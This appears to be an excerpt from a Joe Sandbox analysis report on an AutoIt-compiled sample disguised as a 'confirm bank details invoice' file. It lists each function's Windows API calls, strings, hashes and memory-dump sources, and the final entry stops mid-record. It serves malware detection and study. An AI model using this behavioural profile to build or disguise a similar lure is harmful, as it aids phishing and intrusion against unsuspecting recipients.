                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                    • API String ID: 699586101-1459072770
                    • Opcode ID: c8137021a176b50443af43eda4cd8b30a66cc0e1e68e9b1aa62f78a94a34e716
                    • Instruction ID: 7d55444cd64c778340d7b6f2c8a36e644524dbf54c621e5e7d219fd598eb0d5c
                    • Opcode Fuzzy Hash: c8137021a176b50443af43eda4cd8b30a66cc0e1e68e9b1aa62f78a94a34e716
                    • Instruction Fuzzy Hash: 2541B471A002017BEB04BB669C47EBF7BBCEF45714F04046FF905A6182EB7CAA419769
                    Function 0048A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0048A939
                    • GetSystemMetrics.USER32(00000007), ref: 0048A941
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0048A96C
                    • GetSystemMetrics.USER32(00000008), ref: 0048A974
                    • GetSystemMetrics.USER32(00000004), ref: 0048A999
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0048A9B6
                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0048A9C6
                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0048A9F9
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0048AA0D
                    • GetClientRect.USER32(00000000,000000FF), ref: 0048AA2B
                    • GetStockObject.GDI32(00000011), ref: 0048AA47
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0048AA52
                      • Part of subcall function 0048B63C: GetCursorPos.USER32(000000FF), ref: 0048B64F
                      • Part of subcall function 0048B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0048B66C
                      • Part of subcall function 0048B63C: GetAsyncKeyState.USER32(00000001), ref: 0048B691
                      • Part of subcall function 0048B63C: GetAsyncKeyState.USER32(00000002), ref: 0048B69F
                    • SetTimer.USER32(00000000,00000000,00000028,0048AB87), ref: 0048AA79
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: 9570b3d87c169a6d171a4aa903e0f7c2b1df9147dabd53a1177c09bc115ba291
                    • Instruction ID: 09f1bccebafa84eeaba2579bd70da86f3e528cefa60512bb2bf529d9e11a679d
                    • Opcode Fuzzy Hash: 9570b3d87c169a6d171a4aa903e0f7c2b1df9147dabd53a1177c09bc115ba291
                    • Instruction Fuzzy Hash: AEB1C571A0020A9FDB14EFA8DC45BAE7BB5FB08315F10412AFA05E7390DB78E851CB59
                    Function 004D3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004D3735
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0050DC00,00000000,?,00000000,?,?), ref: 004D37A3
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004D37EB
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 004D3874
                    • RegCloseKey.ADVAPI32(?), ref: 004D3B94
                    • RegCloseKey.ADVAPI32(00000000), ref: 004D3BA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    • Opcode ID: cb9b9845a921523b5500b8eff31a9b9d317bedab8e5f3a5676ab6170b828f620
                    • Instruction ID: a19151acd050cd05519832c2688d3815acc9c5ed9ba67feafc1f4961d834ab75
                    • Opcode Fuzzy Hash: cb9b9845a921523b5500b8eff31a9b9d317bedab8e5f3a5676ab6170b828f620
                    • Instruction Fuzzy Hash: 46026E756046019FCB14EF15C851A6EB7E5FF88714F04845EF98A9B3A2CB78ED01CB8A
                    Function 004D6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 004D6C56
                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004D6D16
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                    • API String ID: 3974292440-719923060
                    • Opcode ID: 08fcca3bf5ef7bbfed70ee5261523bed42a7105fc8ab7cef5e3894b764b12ced
                    • Instruction ID: 9445baf013b150e05385a24c98d0987381c5e4bb9344b65ed35e37d4c6a6bd20
                    • Opcode Fuzzy Hash: 08fcca3bf5ef7bbfed70ee5261523bed42a7105fc8ab7cef5e3894b764b12ced
                    • Instruction Fuzzy Hash: 77A19E306142419BCB14EF15C861A6EB3E2FF55318F11896FB85A5B3D2DB38EC06CB89
                    Function 004ACF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 004ACF91
                    • __swprintf.LIBCMT ref: 004AD032
                    • _wcscmp.LIBCMT ref: 004AD045
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004AD09A
                    • _wcscmp.LIBCMT ref: 004AD0D6
                    • GetClassNameW.USER32(?,?,00000400), ref: 004AD10D
                    • GetDlgCtrlID.USER32(?), ref: 004AD15F
                    • GetWindowRect.USER32(?,?), ref: 004AD195
                    • GetParent.USER32(?), ref: 004AD1B3
                    • ScreenToClient.USER32(00000000), ref: 004AD1BA
                    • GetClassNameW.USER32(?,?,00000100), ref: 004AD234
                    • _wcscmp.LIBCMT ref: 004AD248
                    • GetWindowTextW.USER32(?,?,00000400), ref: 004AD26E
                    • _wcscmp.LIBCMT ref: 004AD282
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                    • String ID: %s%u
                    • API String ID: 3119225716-679674701
                    • Opcode ID: 80983f49c9194691500b849ea002e36abfa7b46abd3d807fddec3a48319ff240
                    • Instruction ID: b90f4c8b8c86b79583b6b355e38a633bf6b96ce8daa4aa74c75e114bdb78319c
                    • Opcode Fuzzy Hash: 80983f49c9194691500b849ea002e36abfa7b46abd3d807fddec3a48319ff240
                    • Instruction Fuzzy Hash: DEA10572A04302AFD714DF64C884FABB7A8FF65314F00852BF95AD2690DB38E915CB95
                    Function 004AD8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 004AD8EB
                    • _wcscmp.LIBCMT ref: 004AD8FC
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 004AD924
                    • CharUpperBuffW.USER32(?,00000000), ref: 004AD941
                    • _wcscmp.LIBCMT ref: 004AD95F
                    • _wcsstr.LIBCMT ref: 004AD970
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 004AD9A8
                    • _wcscmp.LIBCMT ref: 004AD9B8
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 004AD9DF
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 004ADA28
                    • _wcscmp.LIBCMT ref: 004ADA38
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 004ADA60
                    • GetWindowRect.USER32(00000004,?), ref: 004ADAC9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: 7e7b6a2defe25a498dba7fc4c22bd230d15234dbaa0f6a752b4bfe9857d9cfd8
                    • Instruction ID: bf9e855cd4efe080def8d03eafeca48608158d43c6cd1d10abbdca8e03ca8063
                    • Opcode Fuzzy Hash: 7e7b6a2defe25a498dba7fc4c22bd230d15234dbaa0f6a752b4bfe9857d9cfd8
                    • Instruction Fuzzy Hash: DE81D0714083059BDB01DF10C884BAB7BE8EF55318F04846FFD8A9A596DB38ED45CBA9
                    Function 004AD6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: be34e04cb9fe810bc1a241ea635eda9934c30aca17acb200a62d953b9c98ff9c
                    • Instruction ID: 65de8941cb3a021fba2aa71d5f12cdba1e5072091e8926308b1d9ae57faea3f6
                    • Opcode Fuzzy Hash: be34e04cb9fe810bc1a241ea635eda9934c30aca17acb200a62d953b9c98ff9c
                    • Instruction Fuzzy Hash: E731E139D04205BADB18FA11ED43EEE7774AF22708F60002FF416710D1EB69AF00C669
                    Function 004AEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • LoadIconW.USER32(00000063), ref: 004AEAB0
                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004AEAC2
                    • SetWindowTextW.USER32(?,?), ref: 004AEAD9
                    • GetDlgItem.USER32(?,000003EA), ref: 004AEAEE
                    • SetWindowTextW.USER32(00000000,?), ref: 004AEAF4
                    • GetDlgItem.USER32(?,000003E9), ref: 004AEB04
                    • SetWindowTextW.USER32(00000000,?), ref: 004AEB0A
                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004AEB2B
                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004AEB45
                    • GetWindowRect.USER32(?,?), ref: 004AEB4E
                    • SetWindowTextW.USER32(?,?), ref: 004AEBB9
                    • GetDesktopWindow.USER32 ref: 004AEBBF
                    • GetWindowRect.USER32(00000000), ref: 004AEBC6
                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 004AEC12
                    • GetClientRect.USER32(?,?), ref: 004AEC1F
                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 004AEC44
                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004AEC6F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                    • String ID:
                    • API String ID: 3869813825-0
                    • Opcode ID: a1774cee3b13814c8ce384671169abc3d78336b1f32e24f12990a4562a6f1294
                    • Instruction ID: fb0732601311cd9d45e71dfb37ef22aadb325786b7a92cf9bc2c31b12a5063d6
                    • Opcode Fuzzy Hash: a1774cee3b13814c8ce384671169abc3d78336b1f32e24f12990a4562a6f1294
                    • Instruction Fuzzy Hash: D7515B71900709AFEB20DFA9CD89B6FBBF5FF04704F004929E696A26A0C774B914CB14
                    Function 004C79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 004C79C6
                    • LoadCursorW.USER32(00000000,00007F00), ref: 004C79D1
                    • LoadCursorW.USER32(00000000,00007F03), ref: 004C79DC
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 004C79E7
                    • LoadCursorW.USER32(00000000,00007F01), ref: 004C79F2
                    • LoadCursorW.USER32(00000000,00007F81), ref: 004C79FD
                    • LoadCursorW.USER32(00000000,00007F88), ref: 004C7A08
                    • LoadCursorW.USER32(00000000,00007F80), ref: 004C7A13
                    • LoadCursorW.USER32(00000000,00007F86), ref: 004C7A1E
                    • LoadCursorW.USER32(00000000,00007F83), ref: 004C7A29
                    • LoadCursorW.USER32(00000000,00007F85), ref: 004C7A34
                    • LoadCursorW.USER32(00000000,00007F82), ref: 004C7A3F
                    • LoadCursorW.USER32(00000000,00007F84), ref: 004C7A4A
                    • LoadCursorW.USER32(00000000,00007F04), ref: 004C7A55
                    • LoadCursorW.USER32(00000000,00007F02), ref: 004C7A60
                    • LoadCursorW.USER32(00000000,00007F89), ref: 004C7A6B
                    • GetCursorInfo.USER32(?), ref: 004C7A7B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Cursor$Load$Info
                    • String ID:
                    • API String ID: 2577412497-0
                    • Opcode ID: 56510c232f446fb641752e3e7d2dc7ee01559fd2aed2334bc078897b6ca44539
                    • Instruction ID: 0fed7915f8b8f30e565e33525deee3fdb7a34f7417252415ea1f741e08c7a07c
                    • Opcode Fuzzy Hash: 56510c232f446fb641752e3e7d2dc7ee01559fd2aed2334bc078897b6ca44539
                    • Instruction Fuzzy Hash: 043112B0D0831A6ADB509FB68C89D6FBEE8FF04750F50453BA50DE7280DA7DA5008FA5
                    Function 0047C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0047C8B7,?,00002000,?,?,00000000,?,0047419E,?,?,?,0050DC00), ref: 0048E984
                      • Part of subcall function 0047660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004753B1,?,?,004761FF,?,00000000,00000001,00000000), ref: 0047662F
                    • __wsplitpath.LIBCMT ref: 0047C93E
                      • Part of subcall function 00491DFC: __wsplitpath_helper.LIBCMT ref: 00491E3C
                    • _wcscpy.LIBCMT ref: 0047C953
                    • _wcscat.LIBCMT ref: 0047C968
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0047C978
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0047CABE
                      • Part of subcall function 0047B337: _wcscpy.LIBCMT ref: 0047B36F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 2258743419-1018226102
                    • Opcode ID: 070924494adc91b04ded8dbbbda91841b6d985d538ab1a73a6a1c4ff3fc4af5b
                    • Instruction ID: 33de20e7325a378e836f95a4f90bd2f50f112ac13d7ffc72573795a3a95945a7
                    • Opcode Fuzzy Hash: 070924494adc91b04ded8dbbbda91841b6d985d538ab1a73a6a1c4ff3fc4af5b
                    • Instruction Fuzzy Hash: A112AF715083419FC725EF25C881AAFBBE5BF99308F00491FF58993251DB38DA49CB5A
                    Function 004DCE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004DCEFB
                    • DestroyWindow.USER32(?,?), ref: 004DCF73
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 004DCFF4
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 004DD016
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004DD025
                    • DestroyWindow.USER32(?), ref: 004DD042
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00470000,00000000), ref: 004DD075
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004DD094
                    • GetDesktopWindow.USER32 ref: 004DD0A9
                    • GetWindowRect.USER32(00000000), ref: 004DD0B0
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004DD0C2
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 004DD0DA
                      • Part of subcall function 0048B526: GetWindowLongW.USER32(?,000000EB), ref: 0048B537
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 3877571568-3619404913
                    • Opcode ID: e907a54fbc5ae12743c062df0b20446d1ddaf915846ebb2b2dcecb434641a549
                    • Instruction ID: 545c0b12c1f4776674ee31aa2e6a8d24ee79ff44de788c64283a3cf59b71ebfd
                    • Opcode Fuzzy Hash: e907a54fbc5ae12743c062df0b20446d1ddaf915846ebb2b2dcecb434641a549
                    • Instruction Fuzzy Hash: 7A71CD70540205AFE721CF28CC95FAA7BE5EB89708F04451EF985873A1C738E946DB1A
                    Function 004DF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • DragQueryPoint.SHELL32(?,?), ref: 004DF37A
                      • Part of subcall function 004DD7DE: ClientToScreen.USER32(?,?), ref: 004DD807
                      • Part of subcall function 004DD7DE: GetWindowRect.USER32(?,?), ref: 004DD87D
                      • Part of subcall function 004DD7DE: PtInRect.USER32(?,?,004DED5A), ref: 004DD88D
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004DF3E3
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004DF3EE
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004DF411
                    • _wcscat.LIBCMT ref: 004DF441
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 004DF458
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004DF471
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 004DF488
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 004DF4AA
                    • DragFinish.SHELL32(?), ref: 004DF4B1
                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 004DF59C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                    • API String ID: 169749273-3440237614
                    • Opcode ID: edc42fc195a9a0418b19d12bc8afcdb085d4cc1245f69d3f19ce618713b31924
                    • Instruction ID: 5be0a7568a0cdd213812fba216a2cffca629654862301c03845100e5d656c52e
                    • Opcode Fuzzy Hash: edc42fc195a9a0418b19d12bc8afcdb085d4cc1245f69d3f19ce618713b31924
                    • Instruction Fuzzy Hash: DF615771508300AFC311EF65DC85EAFBBE8FF89714F004A2EB595922A1DB749A09CB56
                    Function 004BAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(00000000), ref: 004BAB3D
                    • VariantCopy.OLEAUT32(?,?), ref: 004BAB46
                    • VariantClear.OLEAUT32(?), ref: 004BAB52
                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004BAC40
                    • __swprintf.LIBCMT ref: 004BAC70
                    • VarR8FromDec.OLEAUT32(?,?), ref: 004BAC9C
                    • VariantInit.OLEAUT32(?), ref: 004BAD4D
                    • SysFreeString.OLEAUT32(00000016), ref: 004BADDF
                    • VariantClear.OLEAUT32(?), ref: 004BAE35
                    • VariantClear.OLEAUT32(?), ref: 004BAE44
                    • VariantInit.OLEAUT32(00000000), ref: 004BAE80
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                    • API String ID: 3730832054-3931177956
                    • Opcode ID: a7a1644efff19318b4a2fcf1fac99f336e373ae00e2a4feb4414b21a6ef3c27f
                    • Instruction ID: 6cc678c61f45ea4a9c9da8c8747f259c559654c56aacbd11086e7ec6f9d1f75f
                    • Opcode Fuzzy Hash: a7a1644efff19318b4a2fcf1fac99f336e373ae00e2a4feb4414b21a6ef3c27f
